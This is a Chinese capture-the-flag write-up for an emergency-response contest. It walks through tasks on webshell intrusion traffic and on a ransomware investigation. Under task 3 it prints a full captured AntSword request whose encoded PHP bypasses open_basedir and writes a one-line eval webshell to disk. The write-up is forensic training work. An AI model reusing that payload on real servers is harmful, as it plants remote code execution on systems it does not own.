2025年Solar应急响应公益月赛-11月wp
emergency
任务1
已完成
任务名称:提交黑客的IP地址
任务分数:100.00
任务类型:静态Flag
提交格式为flag{0.0.0.0}
蚁剑的🐎
任务2
任务名称:提交黑客初始连接的PHP一句话木马密码
任务分数:100.00
任务类型:静态Flag
提交格式为flag{abc} flag{shell}
任务3
任务名称:提交黑客通过初始连接一句话木马后创建新的一句话木马文件的MD5
任务分数:100.00
任务类型:静态Flag
提交格式为flag{md5}
62流 没有shell的php 64有了 说明63写了🐎
d498cc0709be5f=jgQzovcGhwc3R1ZHlfcHJvL1dXVy9zaGVsbC5waHA%3D&m58d3ef53bcb85=3C3F70687020406576616C28245F504F53545B2271736E6374665F323032355F6C6162225D293B203F3E0A&shell=%40ini_set(%22display_errors%22%2C%20%220%22)%3B%40set_time_limit(0)%3B%24opdir%3D%40ini_get(%22open_basedir%22)%3Bif(%24opdir)%20%7B%24ocwd%3Ddirname(%24_SERVER%5B%22SCRIPT_FILENAME%22%5D)%3B%24oparr%3Dpreg_split(base64_decode(%22Lzt8Oi8%3D%22)%2C%24opdir)%3B%40array_push(%24oparr%2C%24ocwd%2Csys_get_temp_dir())%3Bforeach(%24oparr%20as%20%24item)%20%7Bif(!%40is_writable(%24item))%7Bcontinue%3B%7D%3B%24tmdir%3D%24item.%22%2F.a5293%22%3B%40mkdir(%24tmdir)%3Bif(!%40file_exists(%24tmdir))%7Bcontinue%3B%7D%24tmdir%3Drealpath(%24tmdir)%3B%40chdir(%24tmdir)%3B%40ini_set(%22open_basedir%22%2C%20%22..%22)%3B%24cntarr%3D%40preg_split(%22%2F%5C%5C%5C%5C%7C%5C%2F%2F%22%2C%24tmdir)%3Bfor(%24i%3D0%3B%24i%3Csizeof(%24cntarr)%3B%24i%2B%2B)%7B%40chdir(%22..%22)%3B%7D%3B%40ini_set(%22open_basedir%22%2C%22%2F%22)%3B%40rmdir(%24tmdir)%3Bbreak%3B%7D%3B%7D%3B%3Bfunction%20asenc(%24out)%7Breturn%20%24out%3B%7D%3Bfunction%20asoutput()%7B%24output%3Dob_get_contents()%3Bob_end_clean()%3Becho%20%228484%22.%22cc18c%22%3Becho%20%40asenc(%24output)%3Becho%20%2286bcb%22.%22d0c52%22%3B%7Dob_start()%3Btry%7B%24f%3Dbase64_decode(substr(%24_POST%5B%22d498cc0709be5f%22%5D%2C2))%3B%24c%3D%24_POST%5B%22m58d3ef53bcb85%22%5D%3B%24c%3Dstr_replace(%22%5Cr%22%2C%22%22%2C%24c)%3B%24c%3Dstr_replace(%22%5Cn%22%2C%22%22%2C%24c)%3B%24buf%3D%22%22%3Bfor(%24i%3D0%3B%24i%3Cstrlen(%24c)%3B%24i%2B%3D2)%24buf.%3Durldecode(%22%25%22.substr(%24c%2C%24i%2C2))%3Becho(%40fwrite(fopen(%24f%2C%22a%22)%2C%24buf)%3F%221%22%3A%220%22)%3B%3B%7Dcatch(Exception%20%24e)%7Becho%20%22ERROR%3A%2F%2F%22.%24e-%3EgetMessage()%3B%7D%3Basoutput()%3Bdie()%3B
任务4
任务名称:提交黑客创建的不死马的密码
任务分数:100.00
任务类型:静态Flag
提交格式为flag{md5}
流75有写马动作 不死马
任务5、6
任务名称:提交黑客上传的恶意文件(远程控制木马)的名称
任务分数:100.00
任务类型:静态Flag
提交格式为flag{abc.exe} 流89有上传动作,蚁剑的马要去掉前俩字符
内容为16进制
直接计算即可
任务7
任务名称:提交黑客上传的恶意文件(远程控制木马)的端口
任务分数:100.00
任务类型:静态Flag
提交格式为flag{1234} 可以用沙箱分析
也可以看tcp包
手动分析还需要练练
任务8、9
任务名称:请提交黑客创建用户账户的用户名
任务分数:100.00
任务类型:静态Flag
提交格式为flag{username}
流中还是默认账号,但是中间有流量无回显那么说明操作了什么,并且msf的流量解密很难,应该还是在蚁剑操作的
流98中添加了 账号密码 隐藏账号,怪不得net user没有。
任务10
已完成
任务名称:请提交黑客创建用户账户的时间
任务分数:100.00
任务类型:静态Flag
flag{2025/01/01 01:00:00}
flag{2025/11/20 16:13:32}
用服务器的时间要+8
2700勒索病毒排查
任务1
已完成
任务名称:此勒索家族名称是什么?
任务分数:100.00
任务类型:静态Flag
此勒索家族名称是什么?可访问应急响应.com进行查询,大小写敏感,最终以flag{}提交
任务2
已完成
任务名称:勒索病毒预留的ID是什么
任务分数:100.00
任务类型:静态Flag
勒索病毒预留的ID是什么(预留ID为勒索组织恢复的凭证),以flag{}提交,如有多个以&进行连接
任务3
任务名称:提交开始加密的时间
任务分数:100.00
任务类型:静态Flag
提交开始加密的时间,以flag{2025/1/1 11:11}格式提交,info的时间
任务4
任务名称:提交flag
任务分数:200.00
任务类型:静态Flag
访问:应急响应.com 找到此家族恢复工具进行恢复,提交C:\Users\Solar\Desktop\lSimulation_Desktop_Files\flag.txt文件中的flag
单文件恢复好像有问题 直接全盘恢复
任务5
任务名称:提交发送邮件的邮箱
任务分数:100.00
任务类型:静态Flag
提交C:\Users\Solar\Desktop\工具\mail 发送邮件的邮箱,以flag{xxx@xxx.com}格式提交
任务6
已完成
任务名称:提交发送邮件的IP
任务分数:100.00
任务类型:静态Flag
提交C:\Users\Solar\Desktop\工具\mail 发送邮件的IP,以flag{x.x.x.x}格式提交
任务7
已完成
任务名称:提交钓鱼附件中的C2地址
任务分数:100.00
任务类型:静态Flag
提交钓鱼附件中的C2地址,以flag{x.x.x.x}格式提交
任务8
已完成
任务名称:提交flag
任务分数:200.00
任务类型:静态Flag
部分数据丢失,好在运维之前做了备份,使用C:\Users\Solar\Desktop\工具\diskgenus恢复C:\Users\Solar\Desktop\工具\backup中的备份内:
没截图 用diskgenus 打开那个HD即可,在administrator的桌面上有个flag,导出既是。
致谢
最后感谢您读到现在,这篇文章匆忙构成肯定有不周到或描述不正确的地方,期待业界师傅们用各种方式指正勘误。如果您感觉文章写的不错或者工具用起来还行,帮笔者点点stars、给公众号点点关注,先谢谢大家了。
emmm 太菜了
一直在路上
